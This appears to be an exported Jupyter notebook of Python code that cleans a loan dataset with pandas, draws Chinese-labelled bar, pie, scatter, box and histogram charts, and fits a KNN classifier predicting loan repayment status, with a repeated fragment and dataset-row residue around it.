#Charge Off数据集的y2
charged_off_annual=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["annual_inc"]]
# In[152]:
#设置图表字体为华文细黑,字号15
plt.rc('font', family='STXihei', size=15)
#绘制散点图,Fully Paid数据集贷款金额x1,用户年收入y1,设置颜色,标记点样式和透明度等参数
plt.scatter(fully_paid_loan,fully_paid_annual,color='#9b59b6',marker='^',s=60)
#绘制散点图,Charge Off数据集贷款金额x2,用户年收入y2,设置颜色,标记点样式和透明度等参数
plt.scatter(charged_off_loan,charged_off_annual,color='#3498db',marker='o',s=60)
#添加图例,显示位置右上角
plt.legend(['Fully Paid', 'Charged Off'], loc='upper right')
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('用户收入')
#添加图表标题
plt.title('贷款金额与用户收入')
#设置背景网格线颜色,样式,尺寸和透明度
plt.grid( linestyle='--', linewidth=0.2)
#显示图表
plt.show()
# In[153]:
#将贷款金额和用户收入设为自变量X
X = np.array(knn_data[['loan_amnt','annual_inc']])
#将贷款状态设为因变量Y
Y = np.array(knn_data['loan_status'])
# In[154]:
#查看自变量和因变量的行数
X.shape,Y.shape
# In[155]:
#将原始数据通过随机方式分割为训练集和测试集,其中测试集占比为40%
X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, Y, test_size=0.4, random_state=0)
# In[156]:
#查看训练集数据的行数
X_train.shape,y_train.shape
# In[157]:
#将训练集代入到KNN模型中
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(X_train,y_train)
# In[158]:
#使用测试集衡量模型准确度
clf.score(X_test, y_test)
# In[159]:
#设置新数据,贷款金额5000,用户收入40000
new_data = np.array([[5000,40000]])
# In[160]:
#对新数据进行分类预测
clf.predict(new_data)
# In[161]:
#新数据属于每一个分类的概率
clf.classes_,clf.predict_proba(new_data) | LoanStats.py |
# In[10]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[11]:
loandata
# In[31]:
loandata.duplicated().value_counts()
# In[13]:
loandata.drop_duplicates()
# In[14]:
loandata['loan_amnt'].isnull().value_counts()
# In[15]:
loandata['annual_inc'].isnull().value_counts()
# In[16]:
loandata['loan_amnt'] = loandata['loan_amnt'].fillna(loandata['total_pymnt'] - loandata['total_rec_int']).astype(np.int64)
# In[18]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[20]:
loandata['annual_inc']
# In[21]:
loandata['loan_status'].value_counts()
# In[27]:
loandata['emp_length'].apply(lambda x : x.isalpha())
# In[28]:
loandata['emp_length'].apply(lambda x : x.isalnum())
# In[29]:
loandata['emp_length'].apply(lambda x : x.isdigit())
# In[30]:
loandata.describe().astype(np.int64).T
# In[35]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[36]:
loandata
# In[53]:
loandata.duplicated().value_counts()
# In[54]:
loandata.drop_duplicates()
# In[41]:
loandata.duplicated().value_counts()
# In[55]:
loandata
# In[44]:
loandata.drop_duplicates()
# In[45]:
loandata
# In[46]:
loandata['loan_amnt'].isnull().value_counts()
# In[47]:
loandata['annual_inc'].isnull().value_counts()
# In[58]:
loandata['loan_amnt']=loandata['loan_amnt'].fillna(loandata['total_pymnt']-loandata['total_rec_int'])
# In[59]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[60]:
loandata['loan_status'].value_counts()
# In[65]:
loandata.describe().T
# In[66]:
loandata.replace([3.500000e+04,500.0],loandata['loan_amnt'].mean())
# In[67]:
loandata['loan_amnt'] = loandata['loan_amnt'].astype(np.int64)
# In[69]:
loandata['issue_d'] = pd.to_datetime(loandata['issue_d'])
# In[70]:
loandata.dtypes
# In[71]:
bins = [0,5,10,15,20]
group_names = ['A','B','C','D']
loandata['categories'] = pd.cut(loandata['open_acc'],bins,labels = group_names)
# In[72]:
loandata
# In[73]:
loandata = loandata.set_index('member_id')
# In[74]:
import numpy as np
import pandas as dp
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[75]:
loandata = loandata.set_index('member_id')
# In[77]:
loandata.head()
# In[78]:
loandata.ix[41000]
# In[79]:
loandata.ix[:,'emp_length']
# In[81]:
loandata.ix[41000,'emp_length']
# In[82]:
loandata.ix[[41000,41001],'loan_amnt']
# In[85]:
loandata.ix[[41000,41001],'loan_amnt'].sum()
# In[86]:
loandata.ix[41000,['loan_amnt','annual_inc']]
# In[87]:
loandata.ix[41000,['loan_data','annual_inc']].sum()
# In[88]:
loandata = loandata.set_index('issue_d')
# In[89]:
loandata
# In[93]:
loandata['2018']
# In[99]:
loandata['2018-03':'2018-05']
# In[101]:
loandata.resample('W',how=sum).head(10)
# In[102]:
loandata.resample('M',how = sum)
# In[103]:
loandata.resample('Q',how = sum)
# In[104]:
loandata.resample('A',how = sum)
# In[105]:
loandata['loan_amnt'].resample('M',how = sum).fillna(0)
# In[106]:
loandata[['loan_amnt','total_rec_int']].resample('M',how = [len,sum])
# In[107]:
loandata['2018-02':'2018-05'].resample('M',how = sum).fillna(0)
# In[108]:
loandata[loandata['loan_amnt'] > 5000].resample('M',how = sum).fillna(0)
# In[114]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[115]:
loandata = loandata.set_index('issue_d')
# In[112]:
loandata
# In[116]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[117]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[119]:
loandata = loandata.set_index('issue_d')
# In[121]:
loandata
# In[122]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[123]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[124]:
loan_grade = loandata.groupby('grade')['loan_amnt'].agg(sum)
# In[125]:
plt.rc('font',family = 'STXihei',size = 15)
# In[126]:
a = np.array([1,2,3,4,5,6])
# In[133]:
plt.bar([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('用户等级')
plt.ylabel('贷款金额')
plt.title('不同用户等级的贷款金额分布')
plt.legend(['贷款金额'],loc = 'upper right')
plt.grid(color = '#95a5a6',linestyle = '--',linewidth = 1,axis = 'y',alpha=0.4)
plt.xticks(a,('A级','B级','C级','D级','E级','F级','G级'))
plt.show()
# In[136]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建一个一维数组赋值给a
a=np.array([1,2,3,4,5,6])
#创建条形图,数据源为分等级贷款金额汇总,设置颜色,透明度和图表边框
plt.barh([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('贷款金额')
plt.ylabel('用户等级')
plt.title('不同用户等级的贷款金额分布')
#添加图例,并设置在图表中的显示位置
plt.legend(['贷款金额'], loc='upper right')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
#设置数据分类名称
plt.yticks(a,('A级','B级','C级','D级','E级','F级','G级'))
#显示图表
plt.show()
# In[142]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#设置饼图中每个数据分类的颜色
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021"]
#设置饼图中每个数据分类的名称
name=['A级', 'B级', 'C级', 'D级', 'E级','F级','G级']
#创建饼图,设置分类标签,颜色和图表起始位置等
plt.pie(loan_grade,labels=name,colors=colors,explode=(0, 0, 0.15, 0, 0, 0,0),startangle=60,autopct='%1.1f%%')
#添加图表标题
plt.title('不同用户等级的贷款金额占比')
#添加图例,并设置显示位置
plt.legend(['A级','B级','C级','D级','E级','F级','G级'], loc='upper left')
#显示图表
plt.show()
# In[143]:
#按月汇总贷款金额,以0填充空值
loan_x=loandata['loan_amnt'].resample('M',how=sum).fillna(0)
#按月汇总利息金额,以0填充空值
loan_y=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建散点图,贷款金额为x,利息金额为y,设置颜色,标记点样式和透明度等
plt.scatter(loan_x,loan_y,60,color='white',marker='o',edgecolors='#0D8ECF',linewidth=3,alpha=0.8)
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('利息收入')
#添加图表标题
plt.title('贷款金额与利息收入')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[145]:
#按月汇总贷款金额及利息
loan_x=loandata['loan_amnt'].resample('M',how=sum).fillna(0)
loan_y=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
loan_z=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#设置气泡图颜色
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021",'#FFF16E','#0D8ECF','#FA4D3D','#D2D2D2','#FFDE45','#9b59b6']
#创建气泡图贷款金额为x,利息金额为y,同时设置利息金额为气泡大小,并设置颜色透明度等。
plt.scatter(loan_x,loan_y,s=loan_z,color=colors,alpha=0.6)
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('利息收入')
#添加图表标题
plt.title('贷款金额与利息收入')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[146]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建箱线图,数据源为贷款来源,设置横向显示
plt.boxplot(loandata['loan_amnt'],1,'rs',vert=False)
#添加x轴标题
plt.xlabel('贷款金额')
#添加图表标题
plt.title('贷款金额分布')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[147]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建直方图,数据源为贷款金额,将数据分为8等份显示,设置颜色和显示方式,透明度等
plt.hist(loandata['loan_amnt'],8,normed=1, histtype='stepfilled',facecolor='#99CC01', rwidth=0.9,alpha=0.6,edgecolor='white')
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('概率')
#添加图表标题
plt.title('贷款金额概率密度')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
#显示图表
plt.show()
# In[148]:
#导入机器学习KNN分析库
from sklearn.neighbors import KNeighborsClassifier
#导入交叉验证库
from sklearn import cross_validation
#导入数值计算库
import numpy as np
#导入科学计算库
import pandas as pd
#导入图表库
import matplotlib.pyplot as plt
# In[149]:
#读取并创建名为knn_data的数据表
knn_data=pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\knn_data.xlsx'))
# In[150]:
#查看数据表前10行
knn_data.head(10)
# In[151]:
#Fully Paid数据集的x1
fully_paid_loan=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["loan_amnt"]]
#Fully Paid数据集的y1
fully_paid_annual=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["annual_inc"]]
#Charge Off数据集的x2
charged_off_loan=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["loan_amnt"]]
#Charge Off数据集的y2
charged_off_annual=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["annual_inc"]]
# In[152]:
#设置图表字体为华文细黑,字号15
plt.rc('font', family='STXihei', size=15)
#绘制散点图,Fully Paid数据集贷款金额x1,用户年收入y1,设置颜色,标记点样式和透明度等参数
plt.scatter(fully_paid_loan,fully_paid_annual,color='#9b59b6',marker='^',s=60)
#绘制散点图,Charge Off数据集贷款金额x2,用户年收入y2,设置颜色,标记点样式和透明度等参数
plt.scatter(charged_off_loan,charged_off_annual,color='#3498db',marker='o',s=60)
#添加图例,显示位置右上角
plt.legend(['Fully Paid', 'Charged Off'], loc='upper right')
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('用户收入')
#添加图表标题
plt.title('贷款金额与用户收入')
#设置背景网格线颜色,样式,尺寸和透明度
plt.grid( linestyle='--', linewidth=0.2)
#显示图表
plt.show()
# In[153]:
#将贷款金额和用户收入设为自变量X
X = np.array(knn_data[['loan_amnt','annual_inc']])
#将贷款状态设为因变量Y
Y = np.array(knn_data['loan_status'])
# In[154]:
#查看自变量和因变量的行数
X.shape,Y.shape
# In[155]:
#将原始数据通过随机方式分割为训练集和测试集,其中测试集占比为40%
X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, Y, test_size=0.4, random_state=0)
# In[156]:
#查看训练集数据的行数
X_train.shape,y_train.shape
# In[157]:
#将训练集代入到KNN模型中
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(X_train,y_train)
# In[158]:
#使用测试集衡量模型准确度
clf.score(X_test, y_test)
# In[159]:
#设置新数据,贷款金额5000,用户收入40000
new_data = np.array([[5000,40000]])
# In[160]:
#对新数据进行分类预测
clf.predict(new_data)
# In[161]:
#新数据属于每一个分类的概率
clf.classes_,clf.predict_proba(new_data) | 0.343232 | 0.766862 |